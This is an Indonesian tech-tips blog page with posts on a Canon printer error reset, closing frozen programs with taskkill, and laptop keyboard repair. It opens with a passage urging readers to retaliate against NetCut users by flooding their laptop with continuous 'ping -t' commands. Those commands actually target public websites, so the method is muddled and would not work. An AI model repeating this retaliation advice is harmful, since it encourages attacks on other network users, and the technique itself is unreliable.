Start menu > run > ketik "cmd" atau command prompt > ketik lagi "arp -a" untuk melihat IP router. Kalau ada lebih dari satu ip router, Nah, @_@
. Kerjai balik si Pembuat ulah. Banjiri laptopnya dengan ping yang bejibun dan terus menerus. Biar cepat hang sekalian terutama jika RAM nya rendah. Amin...!!! start menu > run > ketik "cmd" >> ketik lagi "ping google.com -t" "ping facebook.com -t" "ping yahoo.com -t" "ping zynga.com -t" "ping detik.com -t" "ping vivanews.com -t", trus ampe bejibun. Biar restart skalian.

Yang Saya jelaskan adalah penyerangan
lewat CMD, sebenarnya msh byk cara lain, seperti install program Anti ARP, Hidden komputer dari LAN pake XP antispy, Bisa juga memakai program seperti Anti NetCut
Thanks t0 Kill-9 Crew.

semoga saja dengan cara ini para pengguna netcut akan jerah untuk memutus koneksi orang lain 


 
baca selengkapnya »»  

Senin, 07 Mei 2012

cara memperbaiki printer cannon ip2700 series

Berikut ini saya ingin berbagi pengalaman bagaimana caranya mengatasi pesan error 5200 pada printer Canon IP2770.

Indikasi awalnya adalah pada saat menyalankan printer tersebut adalah sepertinya tidak ada masalah dan sepertinya normal-normal saja. Namun jika kita akan melakukan proses pencetakan / printer maka terlihat jelas akan muncul pesan error 5200 seperti gambar dibawah ini :


Berikut ini adalah cara untuk mengatasi error 5200 pada printer iP2770 pada saat proses pencetakan akan dilakukan :
  1. Printer dalam keadaan mati dan kabel listrik terpasang.
  2. Tekan tombol RESUME selama 3 detik ( tetap ditahan ) lalu tekan tombol POWER sampai lampu hijau menyala.
  3. Lepas tombol RESUME, tombol POWER tetap ditahan.
  4. Tombol POWER masih dalam keadaan ditahan, tekan tombol RESUME 5 kali. (Led akan menyalan bergantian orange, hijau .. dan nyala terakhir adalah orange).
  5. Kemudian lepas kedua tombol secara bersamaan.
  6. Led akan blink sesaat kemudian akan nyala hijau.
  7. Komputer akan mendeteksi hardware printer baru, abaikan saja dan tunggu sesaat sampai selesai pendeteksian printer baru tersebut.
  8. Matikan printer dengan menekan tombol POWER.
  9. Tekan kembali tombol POWER maka printer menyala kembali dan siap untuk digunakan kembali.
Namun demikian cara yang saya lakukan mengatasi error 5200 pada printer iP2770 tersebut adalah dengan cara sebagai berikut :

  1. Hidupkan printer, dan printer akan terlihat normal.
  2. Jalankan printer dengan cara mencetak dokumen atau test print, maka akan terlihat pada windows kecil pesan error 5200.
  3. Buka tutup printer, maka cartridge akan ketengah. Pada posisi ini cabut kabel listrik tanpa menekan tombol on-off ( tombol power ).
  4. Lepas semua cartridge dari tempatnya dan biarkan tutupnya tetap terbuka.
  5. Pasang kembali kabel printer dan hidupkan printer.
  6. Head akan bergeser dan menabrak kekiri dan kekanan karena tutupnya masih terbuka, namun akanberhenti ditengah.
  7. Pasang kembali semua cartridge, dan tutup dengan benar.
  8. Printer akan kembali normal.
Semoga bermanfaat.
 
thankz to core-xp
baca selengkapnya »»  

tips/cara mengatasi komputer hang

hello sobat cyber kali ini saya akan share Tips Mengatasi PC Saat Lagi Lambat atau Lemot - Hampir setiap pengguna komputer yang menggunakan system Windows pasti pernah mengalami komputer yang tiba-tiba "hang", pasti kesal.. dan hal ini tentunya akan mengganggu dan menghambat pekerjaan. Seperti yang pernah saya tulis pada artikel sebelumnya mengenai Tips Mengatasi PC Saat Lagi Lambat atau Lemot yang sangat membuat kita sebagai user bisa sedikit lega. Nah berikut ini tips mudah untuk menutup aplikasi yang Not Responding seperti itu.

Tanda aplikasi yang hang adalah pada title bar aplikasi tertera tulisan Not Responding. Aplikasi yang hang ini tidak bisa ditutup kecuali menggunakan task manager windows.

Menggunakan task manager sebenarnya tidak sulit, tinggal tekan Ctrl + Alt + Del, kemudian klik Start Task Manager. Setelah terbuka cukup pilih aplikasi yang hang, kemudian klik tombol End Task untuk menutup aplikasi yang hang tersebut.

Dengan memanfaatkan file taskkill.exe bawaan windows kita bisa menutup aplikasi not responding dengan jauh lebih mudah. Caranya adalah dengan membuat shortcut ke file taskkill.exe dengan langkah-langkah sebagai berikut :
  • Klik kanan desktop Anda, Pilih "New" -  "Create New Shortcut"
  • Copy-paste kode warna merah di bawah ke field location shortcut
taskkill.exe /f /fi "status eq not responding"
Setelah melakukan langkah di atas maka akan ada sebuah shortcut dengan nama 'taskkill'. Dengan men-double click shortcut tersebut, komputer akan secara otomatis mengidentifikasi dan menutup setiap program 'Not Responding'. Tips ini bekerja pada Windows XP Pro, Vista dan Windows 7. Selamat Mencoba

baca selengkapnya »»  

cara memperbaiki keyboard laptop

HELLO SOBAT s7 kali ini saya akan share sedikit pengetahuan yang sangat penting buat sobat yang berkecimpung di dunia teknisi komputer yaitu bagaimana cara memperbaiki keyboard laptop atau notebook , seperti yang kita tau perbaikan keyborad laptop benar-benar sangat mahal

Sebelum ke pembahasan Cara Memperbaiki Keyboard Laptop / Notebook Macet/Tidak Berfungsi, alangkah baiknya jika kita mengetahui terlebih dahulu beberapa penyebab rusaknya keyboard laptop / notebook, yaitu :
1. keyboard terkena air
2. akibat debu
3. akibat lembabnya ruangan.

Kerusakan yang sering terjadi pada keyboard laptop / notebook adalah salah satu tombol keyboard ada yang tidak berfungsi atau  keyboard laptop / notebook yang rusak itu bergerak sendiri seperti ada yang menekannya.
Hal tersebut terjadi dikarenakan menempelnya kedua lapisan karbon pada flexyble keyboard (akibat jamur atau kotor) sehingga tombol keyboard dapat menekan sendiri atau bahkan tidak dapat digunakan sama sekali.
Ciri-ciri keyboard rusak adalah terdengar bunyi beep berulang-ulang pada saat laptop dinyalakan.
Berikut ini Cara Service Keyboard Laptop / Notebook :
1. Siapkan cutter kecil yang masih baru (tajam)
2. Tentukan tombol keyboard yang kira-kira bermasalah. Dalam kasus ini tombol tab yang rusak.
3. Ambil tombol keyboard yang rusak tersebut dengan mencongkelnya, dan ambil karet yg ada di bawahnya.
4. Dibawah karet ada 2 lapisan karbon yg berbentuk lingkaran. Robek sepertiga lingkaran dari lapisan karbon tersebut.
5. Bersihkan diantara kedua lapisan karbon tersebut dengan cutter itu, dengan cara menggesek-geseknya, tapi jangan terlalu keras, sekedar hanya menghilangkan kotoran diantara kedua lapisan karbon tersebut. Kalau terlalu keras dikhawatirkan lapisan karbon ikut hilang.

 

6. Keyboard siap dicoba, dan jika sudah OK, anda dapat memasang kembali karet dan tombol keyboardnya.

thankz to www.asrizal.com
baca selengkapnya »»